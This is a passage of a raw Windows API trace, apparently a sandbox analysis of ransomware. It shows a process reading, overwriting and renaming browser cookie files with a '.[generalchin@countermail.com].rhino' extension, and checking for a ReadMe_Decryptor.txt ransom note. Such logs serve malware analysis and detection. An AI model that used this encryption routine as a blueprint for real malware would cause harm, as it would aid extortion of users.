RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.527] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.527] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.527] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.527] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0089.610] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x82 [0089.610] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1a2, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.610] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.610] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.612] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.613] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x82, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x82, lpOverlapped=0x0) returned 1 [0089.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.613] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.613] GetLastError () returned 0x0 [0089.613] SetLastError (dwErrCode=0x0) [0089.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x82) returned 0x72a920 [0089.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0198 [0089.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02a0 [0089.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.614] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0089.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.614] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0089.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b0048 [0089.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a2) returned 0x23b0428 [0089.615] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.615] WriteFile (in: hFile=0x104, lpBuffer=0x23b0428*, nNumberOfBytesToWrite=0x1a2, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0428*, lpNumberOfBytesWritten=0x2cfa04*=0x1a2, lpOverlapped=0x0) returned 1 [0089.616] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.616] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1a2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.616] CloseHandle (hObject=0x104) returned 1 [0089.617] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0089.617] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0428 [0089.617] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0089.617] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.618] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0428 | out: hHeap=0x6d0000) returned 1 [0089.618] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02a0 | out: hHeap=0x6d0000) returned 1 [0089.618] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.618] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.618] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.618] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.618] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.618] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.618] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.619] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.619] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0089.735] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x110 [0089.735] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x230, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.735] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.735] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.737] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.737] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x110, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x110, lpOverlapped=0x0) returned 1 [0089.737] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.738] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.738] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.738] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.738] GetLastError () returned 0x0 [0089.738] SetLastError (dwErrCode=0x0) [0089.738] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.738] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b00f0 [0089.738] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.738] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0208 [0089.738] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0310 [0089.738] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0208 | out: hHeap=0x6d0000) returned 1 [0089.738] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.738] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.738] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.738] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.738] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.738] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.738] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0089.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0089.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.739] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0208 [0089.740] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0498 [0089.740] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0208 | out: hHeap=0x6d0000) returned 1 [0089.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x230) returned 0x23b05e0 [0089.740] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0498 | out: hHeap=0x6d0000) returned 1 [0089.740] WriteFile (in: hFile=0x104, lpBuffer=0x23b05e0*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b05e0*, lpNumberOfBytesWritten=0x2cfa04*=0x230, lpOverlapped=0x0) returned 1 [0089.740] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b05e0 | out: hHeap=0x6d0000) returned 1 [0089.740] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x230, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.740] CloseHandle (hObject=0x104) returned 1 [0089.742] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b0208 [0089.742] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b0498 [0089.742] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0208 | out: hHeap=0x6d0000) returned 1 [0089.742] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.743] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0498 | out: hHeap=0x6d0000) returned 1 [0089.743] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0310 | out: hHeap=0x6d0000) returned 1 [0089.743] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.743] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.743] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.743] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.743] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.743] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.743] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0089.798] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x256 [0089.799] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x376, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.799] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.799] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.807] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.808] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x256, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x256, lpOverlapped=0x0) returned 1 [0089.808] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.808] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.808] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.808] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.808] GetLastError () returned 0x0 [0089.808] SetLastError (dwErrCode=0x0) [0089.808] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.808] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x256) returned 0x23b0198 [0089.808] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.808] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b03f8 [0089.809] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0500 [0089.809] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03f8 | out: hHeap=0x6d0000) returned 1 [0089.809] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.809] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.809] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.809] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.809] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.809] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.809] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.809] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.809] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.809] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.809] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0089.809] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.809] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0089.809] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.809] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.809] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.810] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.810] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.810] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.810] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.810] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.810] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.810] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.810] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.810] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.810] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.810] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b03f8 [0089.810] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.810] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0688 [0089.810] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03f8 | out: hHeap=0x6d0000) returned 1 [0089.810] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b07d0 [0089.810] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0688 | out: hHeap=0x6d0000) returned 1 [0089.810] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b09b8 [0089.810] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b07d0 | out: hHeap=0x6d0000) returned 1 [0089.810] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75ef78 [0089.811] HeapFree (in: 